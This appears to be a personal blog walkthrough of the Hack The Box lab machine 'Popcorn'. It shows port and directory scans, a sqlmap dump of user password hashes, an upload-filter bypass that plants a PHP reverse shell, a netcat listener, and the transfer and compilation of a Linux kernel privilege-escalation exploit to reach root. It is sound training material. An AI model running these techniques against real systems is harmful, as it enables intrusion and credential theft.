18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Popcorn

Starting with port scan.

root@n0w4n:~/opt/htb/popcorn# nmap -n -A -T4 -sC -oN scan -p- 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 14:09 CEST
Nmap scan report for 10.10.10.6
Host is up (0.022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=35361%PV=Y%DS=2%DC=T%G=Y%TM=5B698C33
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=C4%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=8)OPS(O1
OS:=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW
OS:6%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=
OS:Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q
OS:=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A
OS:=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%D
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL
OS:=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   21.31 ms 10.10.14.1
2   21.52 ms 10.10.10.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.46 seconds

The scan shows port 22 (SSH) and 80 (HTTP) are open.

root@n0w4n:~/opt/htb/popcorn# gobuster -u http://10.10.10.6 -w /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -f -r
Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/
[+] Threads      : 10
[+] Wordlist     : /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes : 307,200,204,301,302
[+] Add Slash    : true
[+] Follow Redir : true
=====================================================
/test/ (Status: 200)
/icons/ (Status: 200)
/torrent/ (Status: 200)
/rename/ (Status: 200)
=====================================================

/rename/ gives as output:

Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

/test/ gives as output the phpinfo file.

/torrent/ gives as torrent portal.

Because this is a web application I check searchsploit if there is a known exploit.

root@n0w4n:~/opt/htb/celestial# searchsploit torrent hoster
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Torrent Hoster - Remount Upload                                | exploits/php/webapps/11746.txt
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

After checking the text file it looks like there is a upload vulnerability to exploit.
To enter the upload page you need to login….so a quick register is all it takes.

When I try to upload a php shell I get an error: “This is not a valid torrent file”.
Because it can take some time to run SQLmap I’m gonna run it while doing some more recon.

root@n0w4n:~/opt/htb/popcorn# sqlmap -r header.txt --risk=3 --level=5 --dbms=MySQL -D torrenthoster -T users --dump
--SNIP--
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+
| id | email                | joined              | userName | password                         | privilege | lastconnect         |
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+
| 3  | admin@yourdomain.com | 2007-01-06 21:12:46 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | 2007-01-06 21:12:46 |
| 5  | n0w4n@mail.com       | 2018-08-07 16:40:08 | n0w4n    | 97b226b779145337eb1632fa51eb01f2 | user      | 2018-08-07 16:40:08 |
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+

Got my own account and an admin. Unfortunately the admin password isn’t in my wordlist and also it isn’t to be found in crackstation.
Let’s get more info about /torrent/

root@n0w4n:~/opt/htb/popcorn# gobuster -u http://10.10.10.6/torrent/ -w /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -s 200,301,307 -t 20
Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/torrent/
[+] Threads      : 20
[+] Wordlist     : /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes : 200,301,307
=====================================================
/images (Status: 301)
/admin (Status: 301)
/js (Status: 301)
/templates (Status: 301)
/css (Status: 301)
/comment (Status: 200)
/logout (Status: 200)
/login (Status: 200)
/download (Status: 200)
/lib (Status: 301)
/config (Status: 200)
/upload (Status: 301)
/database (Status: 301)
/rss (Status: 200)
/secure (Status: 200)
/users (Status: 301)
/index (Status: 200)
/preview (Status: 200)
/edit (Status: 200)
/browse (Status: 200)
/health (Status: 301)
/stylesheet (Status: 200)
/torrents (Status: 301)
/thumbnail (Status: 200)
/hide (Status: 200)
/readme (Status: 301)
/upload_file (Status: 200)
/validator (Status: 200)
/PNG (Status: 301)
=====================================================

That’s some good info to have for a bit later on.
To successfully upload a torrent file I just got a random file from the internet and uploaded it. When I go to the location of the upload I have to opportunity to change the logo for the upload. Hopefully this will give me the change to upload a working shell script.

There is a filter that only accepts jpg, jpeg, gif, png. So I altered the name of my shell.php to shell.png and ran Burp to capture the post request.
Then I adjusted the filename and changed it to php while leave the MIME type as it is (png). Then I started a listener on my kali box.
After that I found my upload in the /upload/ folder (like shown in the second gobuster scan).

root@n0w4n:~/opt/htb/popcorn# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.6] 59341
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 17:26:33 up 1 day, 10:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@popcorn:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@popcorn:/$
www-data@popcorn:/home/george$ cat user.txt
cat user.txt
5e36a919398ecc5d5c110f2d865cf136

First flag. Now for the root flag.

www-data@popcorn:/home/george$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"

I uploaded an exploit suggester and it found some possible vulnerabilities.

www-data@popcorn:/tmp$ ./file.pl
./file.pl
  #############################
    Linux Exploit Suggester 2
  #############################
  Local Kernel: 2.6.31
  Searching among 71 exploits...
  Possible Exploits:
[+] american-sign-language
     CVE-2010-4347
     Source: http://www.securityfocus.com/bid/45408/
[+] can_bcm
     CVE-2010-2959
     Source: http://www.exploit-db.com/exploits/14814/
[+] dirty_cow
     CVE-2016-5195
     Source: https://www.exploit-db.com/exploits/40616/
[+] do_pages_move
     Alt: sieve      CVE-2010-0415
     Source: Spenders Enlightenment
[+] half_nelson
     Alt: econet      CVE-2010-3848
     Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
     Alt: econet      CVE-2010-3848
     Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
     Alt: econet      CVE-2010-3850
     Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
     Alt: econet      CVE-2010-4073
     Source: http://www.exploit-db.com/exploits/17787/
[+] msr
     CVE-2013-0268
     Source: http://www.exploit-db.com/exploits/27297/
[+] pipe.c_32bit
     CVE-2009-3547
     Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] pktcdvd
     CVE-2010-3437
     Source: http://www.exploit-db.com/exploits/15150/
[+] ptrace_kmod2
     Alt: ia32syscall,robert_you_suck      CVE-2010-3301
     Source: http://www.exploit-db.com/exploits/15023/
[+] rawmodePTY
     CVE-2014-0196
     Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[+] rds
     CVE-2010-3904
     Source: http://www.exploit-db.com/exploits/15285/
[+] reiserfs
     CVE-2010-1146
     Source: http://www.exploit-db.com/exploits/12130/
[+] video4linux
     CVE-2010-3081
     Source: http://www.exploit-db.com/exploits/15024/

One that quickly jumps out is the dirty cow exploit. But because this is a older Ubuntu I wanna check this first.

root@n0w4n:~/opt/htb/popcorn# searchsploit ubuntu 9.10
----------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                         |  Path
                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------- ----------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Es | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Es | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Lo | exploits/linux/local/12130.py
----------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

That looks like a nice one. It adds a temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
I uploaded it onto popcorn but to no avail. I just can’t get it to work.

www-data@popcorn:/tmp$ bash 14339.sh
bash 14339.sh
[*] Ubuntu PAM MOTD local root
'4339.sh: line 39: syntax error near unexpected token `{
'4339.sh: line 39: `backup() {

Also just copying the code into vim isn’t working either. Time for another exploit.
After a very long search and a many tries the following exploit worked.

www-data@popcorn:/tmp$ nc -lp 9999 > file.c
nc -lp 9999 > file.c
root@n0w4n:~/opt/htb/popcorn# searchsploit -p 15704
  Exploit: Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15704/
     Path: /usr/share/exploitdb/exploits/linux/local/15704.c
File Type: C source, ASCII text, with CRLF line terminators
Copied EDB-ID #15704's path to the clipboard.
root@n0w4n:~/opt/htb/popcorn# nc -w3 10.10.10.6 9999 < /usr/share/exploitdb/exploits/linux/local/15704.c
www-data@popcorn:/tmp$ nc -lp 9999 > file.c
nc -lp 9999 > file.c
www-data@popcorn:/tmp$ gcc file.c -o file
gcc file.c -o file
www-data@popcorn:/tmp$ ./file
./file
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf8415280
 [+] Resolved econet_ops to 0xf8415360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cat /root/root.txt
cat /root/root.txt
f122331023a9393319a0370129fd9b14

After all this trouble I checked some write-ups from others and noticed that my original attempt was the right one. But I can’t figure out why the scripts got busted during the transfer.
Maybe my choice of reverse shell had some drawbacks, but I need to follow up on that a next time.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.